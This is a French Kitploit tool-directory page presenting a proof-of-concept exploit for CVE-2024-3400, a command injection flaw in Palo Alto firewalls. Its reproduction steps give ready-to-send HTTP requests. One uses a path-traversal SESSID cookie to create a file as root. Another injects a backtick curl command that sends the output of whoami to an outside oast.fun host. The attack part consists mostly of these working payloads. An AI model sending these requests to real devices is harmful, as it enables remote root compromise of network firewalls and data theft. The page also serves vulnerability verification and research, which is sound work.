Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-3400-poc — Preuve de concept d'exploitation pour CVE-2024-3400, une vulnérabilité d'injection de commandes dans les pare-feu Palo Alto, démontrant la création de fichiers et l'exécution de commandes à distance via des requêtes HTTP spécialement conçues. | Kitploit
Outils/GitHubGitHub/ghassansabir/cve-2024-3400-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et Contrôle
GitHubghassansabir/cve-2024-3400-poc

CVE-2024-3400-poc

Preuve de concept d'exploitation pour CVE-2024-3400, une vulnérabilité d'injection de commandes dans les pare-feu Palo Alto, démontrant la création de fichiers et l'exécution de commandes à distance via des requêtes HTTP spécialement conçues.

Voir le dépôt
il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

PoC CVE-2024-3400 (outil de vérification)

Description de la vulnérabilité

CVE-2024-3400 est une vulnérabilité d'injection de commandes présente dans le système de pare-feu Palo Alto. En envoyant une requête HTTP spécialement conçue, un attaquant peut exécuter des commandes malveillantes sur le serveur cible, voire obtenir les privilèges root.

Étapes de reproduction de la vulnérabilité

  1. Envoyez la requête HTTP suivante :
root@kitploit:~
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/hellome1337.txt;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

Après l'envoi de cette requête, un fichier nommé hellome1337.txt sera créé sur le serveur, et ce fichier disposera des privilèges root.

  1. Lorsque vous tenterez d'accéder à ce fichier, vous devriez recevoir un code de statut HTTP 403 (accès interdit), et non 404 (introuvable).

La capture d'écran illustre l'effet de l'exploitation de cette vulnérabilité :

image

image

Exemple d'injection de commandes

Pour exploiter cette vulnérabilité afin d'effectuer une injection de commandes, vous pouvez envoyer la requête HTTP suivante :

root@kitploit:~
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/minute/h4`curl${IFS}xxxxxxxxxxxxxxxxx.oast.fun?test=$(whoami)`;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

Cette requête exécute la commande whoami sur le serveur et envoie le résultat au serveur distant spécifié (par exemple : xxxxxxxxxxxxxxxxx.oast.fun).

Pour aller plus loin

  • Analyse de Rapid7
  • Analyse du laboratoire WatchTowr
Télécharger l’outil